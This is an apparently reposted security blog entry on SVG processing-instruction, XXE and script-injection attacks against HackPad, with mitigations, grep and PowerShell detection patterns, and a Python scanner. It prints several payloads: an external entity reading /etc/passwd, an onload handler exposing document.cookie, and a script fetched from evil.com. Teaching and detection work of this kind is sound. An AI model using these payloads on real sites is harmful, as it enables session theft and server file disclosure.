Exploiting SVG Document Processing Instructions in HackPad

SVG (Scalable Vector Graphics) is an XML format, so an SVG file can carry anything XML can: processing instructions, a DOCTYPE with entity declarations and, because browsers render SVG as a scriptable document, inline script and event-handler attributes. Gareth Heyes demonstrated that `XMLSerializer` returns the full SVG document, processing instructions included, which is a problem for applications such as HackPad that accept, re-serialize or re-display user-supplied SVG.

You Should Know:

1. Understanding SVG Processing Instructions

SVG is XML, so an SVG file accepts XML processing instructions (`<?target data?>`) both in the prolog and inside elements. The one browsers act on is `<?xml-stylesheet ...?>`, which attaches a CSS or XSLT stylesheet to the document. The `<?xml version="1.0"?>` line looks like a processing instruction but is the XML declaration, which parsers report separately. Everything else in the prolog travels with the file too, including a DOCTYPE with entity declarations. The payload below is therefore not a processing instruction but an external entity declaration (XXE): browsers do not resolve external entities, so it is inert when the SVG is rendered, but a server-side XML parser with external entities enabled will read /etc/passwd into the <text> element:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<text>&xxe;</text>
</svg>

2. Using XMLSerializer to Extract Full SVG

JavaScript's `XMLSerializer` turns a DOM node back into markup, and processing instructions are ordinary DOM nodes (`ProcessingInstruction`), so they come out of the serializer along with everything else. Which ones you get depends on what you serialize: a PI in the XML prolog is a child of the Document node, not of the `<svg>` element, so serializing only the element silently drops it:

// Serializing only the <svg> element returns that element and its subtree.
const svg = document.querySelector('svg');
const serializer = new XMLSerializer();
console.log(serializer.serializeToString(svg)); // PIs inside <svg> only
// For a standalone SVG, serialize the Document node to get the prolog too
// (DOCTYPE, xml-stylesheet PIs and anything else before the root element).
console.log(serializer.serializeToString(svg.ownerDocument));
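The same element-versus-document distinction, as an added Python example that is not from the original post: `xml.dom.minidom` stands in for the browser DOM, and its `toxml()` plays the role of `XMLSerializer.serializeToString`. The sample SVG is constructed for the example, with an `xml-stylesheet` PI in the prolog and a second PI with a made-up target (`hidden-marker`) inside the root element; `evil.xsl` is a placeholder filename and nothing is fetched.

```python
"""Element vs. document serialization (added example, not from the post).

xml.dom.minidom is used as a stand-in for the browser DOM: its toxml()
plays the role of XMLSerializer.serializeToString.
"""
from xml.dom import minidom
from xml.dom.minidom import Node

# Constructed sample: one PI in the prolog and one inside the root element.
# "hidden-marker" is a made-up target; evil.xsl is a placeholder, never fetched.
SAMPLE_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="evil.xsl"?>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <?hidden-marker payload=1?>
  <rect width="10" height="10"/>
</svg>
"""


def list_processing_instructions(svg_bytes: bytes) -> list:
    """Return (target, data, parent node name) for every PI in the document.

    The XML declaration is not a PI and is not reported by the parser.
    """
    doc = minidom.parseString(svg_bytes)
    found = []

    def walk(node):
        for child in node.childNodes:
            if child.nodeType == Node.PROCESSING_INSTRUCTION_NODE:
                found.append((child.target, child.data, node.nodeName))
            walk(child)

    walk(doc)
    return found


def serialize_element_only(svg_bytes: bytes) -> str:
    """Equivalent of serializeToString(document.querySelector('svg')):
    the <svg> subtree only, so PIs in the prolog are silently dropped."""
    return minidom.parseString(svg_bytes).documentElement.toxml()


def serialize_whole_document(svg_bytes: bytes) -> str:
    """Equivalent of serializeToString(svg.ownerDocument): prolog included."""
    return minidom.parseString(svg_bytes).toxml()


if __name__ == "__main__":
    for target, data, parent in list_processing_instructions(SAMPLE_SVG):
        print(f"<?{target} {data}?> is a child of {parent}")
    print("element only  has xml-stylesheet:", "xml-stylesheet" in serialize_element_only(SAMPLE_SVG))
    print("whole document has xml-stylesheet:", "xml-stylesheet" in serialize_whole_document(SAMPLE_SVG))
```

The prolog PI shows up with `#document` as its parent and survives only the whole-document serialization; the PI nested in `<svg>` survives both. A sanitizer that only walks the root element therefore never sees the `xml-stylesheet` instruction.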

3. Exploiting HackPad via SVG

If HackPad stores uploaded SVGs and serves them back unsanitized as image/svg+xml, the file is rendered as a document in the victim's browser and its script runs in the context of the origin that serves it. Delivery matters: script in an SVG executes when the file is opened directly or embedded with <iframe>, <object> or <embed>, but not when it is displayed through <img> or a CSS background image. An attacker could:
– Run JavaScript from an event-handler attribute (the alert is the proof of concept; a real payload would send document.cookie, which belongs to the serving origin, to the attacker):

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>

– Load a remote script via <script> (href is the SVG 2 form and SVG 1.1 renderers expect xlink:href; the root element needs the SVG namespace or a standalone file is not parsed as SVG at all):

<svg xmlns="http://www.w3.org/2000/svg">
<script href="http://evil.com/malicious.js"/>
</svg>

4. Mitigation Techniques

  • Sanitize on the parsed tree, not with regexes: DOMPurify (with its SVG profile) strips script elements and event-handler attributes; confirm that whatever you use also drops the DOCTYPE and processing instructions, since those live outside the root element. If vector fidelity is not needed, re-rasterize uploads to PNG instead.
  • Serve uploads from a separate origin with a CSP that forbids script, sent on the response that delivers the SVG itself (a CSP on the application's HTML pages does not govern an SVG that is opened directly):
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
    The commonly suggested `script-src 'self'; object-src 'none'` also blocks inline script, but `'self'` still permits a script the attacker has uploaded to the same origin.
  • Validate the XML before storing or rendering it, with external entity resolution disabled, and reject files that contain a DOCTYPE, entity declarations or processing instructions.

5. Linux Command to Check for Malicious SVGs

Use `grep` to triage an upload directory for the markers above. This is a heuristic only: it does not understand XML, so changes in case, namespace prefixes or entity encoding can evade it.

grep -rEil '<\?xml-stylesheet|<!DOCTYPE|<!ENTITY|<script|\bon[a-z]+=|javascript:' /var/www/uploads/

6. Windows PowerShell: Detecting Malformed SVGs

Get-ChildItem -Path "C:\web\svgs\" -Recurse -File | Select-String -Pattern '<\?xml-stylesheet|<!DOCTYPE|<!ENTITY|<script|\bon[a-z]+=|javascript:' -List
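A parser-based alternative to the two pattern searches above, as an added Python example that is not part of the original post or of HackPad: it feeds the upload to the standard-library expat parser, reports DOCTYPE and entity declarations, processing instructions, script and foreignObject elements, event-handler attributes and scripting or external hrefs, and records an external entity reference without ever fetching it. The sample SVGs are constructed for the example and reuse the page's payloads; `evil.xsl` and the hostname `evil.com` are placeholders.

```python
"""Parser-based triage of uploaded SVGs (added example, not HackPad code).

Unlike a grep, this parses the file with the stdlib expat parser, so
case changes, namespace prefixes and odd whitespace do not hide a
payload. External entities are reported but never fetched.
"""
from xml.parsers import expat

DANGEROUS_ELEMENTS = {"script", "foreignobject"}  # foreignObject can embed HTML


def scan_svg(svg_bytes: bytes) -> list:
    """Return (finding, detail) tuples for one SVG; an empty list means clean."""
    findings = []
    parser = expat.ParserCreate()  # no namespace expansion: we see raw qualified names

    def local(qname: str) -> str:
        return qname.rsplit(":", 1)[-1].lower()  # "xlink:href" -> "href"

    def on_pi(target, data):  # not called for the <?xml ...?> declaration
        findings.append(("processing-instruction", f"<?{target} {data}?>"))

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(("doctype", name))

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "external-entity-declaration" if (sysid or pubid) else "internal-entity-declaration"
        findings.append((kind, f"{name} -> {sysid or pubid or value}"))

    def on_external_ref(context, base, sysid, pubid):
        findings.append(("external-entity-reference", sysid or pubid or ""))
        return 1  # keep parsing; the entity body is NOT fetched

    def on_start(name, attrs):
        tag = local(name)
        if tag in DANGEROUS_ELEMENTS:
            findings.append(("dangerous-element", tag))
        for attr, value in attrs.items():
            a = local(attr)
            v = value.strip().lower()
            if a.startswith("on"):  # onload, onerror, onclick, ...
                findings.append(("event-handler", f"{tag}@{attr}"))
            elif a == "href":  # href and xlink:href
                # data: URLs are legitimate on <image>, but on <use>/<script> they carry markup
                if v.startswith("javascript:") or (v.startswith("data:") and tag != "image"):
                    findings.append(("scripting-url", f"{tag}@{attr}={value}"))
                elif tag == "script" or v.startswith(("http://", "https://", "//")):
                    findings.append(("external-reference", f"{tag}@{attr}={value}"))

    parser.ProcessingInstructionHandler = on_pi
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(svg_bytes, True)
    except expat.ExpatError as exc:
        # Reject: different renderers recover from broken XML differently.
        findings.append(("malformed-xml", str(exc)))
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    return not scan_svg(svg_bytes)


# Constructed samples: the page's payloads plus one benign file.
XXE_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>"""
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>'
SCRIPT_SVG = b'<svg><script href="http://evil.com/malicious.js"/></svg>'
PI_SVG = b'<?xml-stylesheet type="text/xsl" href="evil.xsl"?><svg xmlns="http://www.w3.org/2000/svg"/>'
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><rect width="10" height="10" fill="#09f"/></svg>'

if __name__ == "__main__":
    for label, sample in [("xxe", XXE_SVG), ("onload", ONLOAD_SVG), ("script", SCRIPT_SVG),
                          ("pi", PI_SVG), ("benign", BENIGN_SVG)]:
        print(label, "SAFE" if is_safe_svg(sample) else scan_svg(sample))
```

The scanner is deliberately strict (any PI or DOCTYPE is a finding) because a legitimate icon or illustration needs neither; if you must accept them, allow-list specific targets rather than relaxing the check. It is a gate, not a sanitizer: files that fail should be rejected or rasterized, not patched up.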

What Undercode Say:

SVG-based attacks remain a significant threat because an SVG is a full XML document that HTML-oriented XSS filters often wave through. Developers must sanitize on the parsed tree, serve uploads from a separate origin and send a CSP on the SVG response itself. Attackers will keep exploiting overlooked XML features, so proactive review of upload handling is essential.

Prediction:

As SVG use in web apps grows, expect more attacks that lean on processing instructions and XML external entities (XXE). Security teams should prioritize SVG sanitization in 2024.

Expected Output:

<?xml version="1.0" encoding="UTF-8"?>
<!-- The xml-stylesheet PI is only honoured here, in the prolog, before the root
     element. The href is a placeholder from the original post: a real payload
     points at an XSLT stylesheet the browser will fetch and apply, and plain
     text such as alert(1) is not a valid stylesheet. -->
<?xml-stylesheet type="text/xsl" href="data:,alert(1)"?>
<svg xmlns="http://www.w3.org/2000/svg"/>

Reported By: Gareth Heyes – Hackers Feeds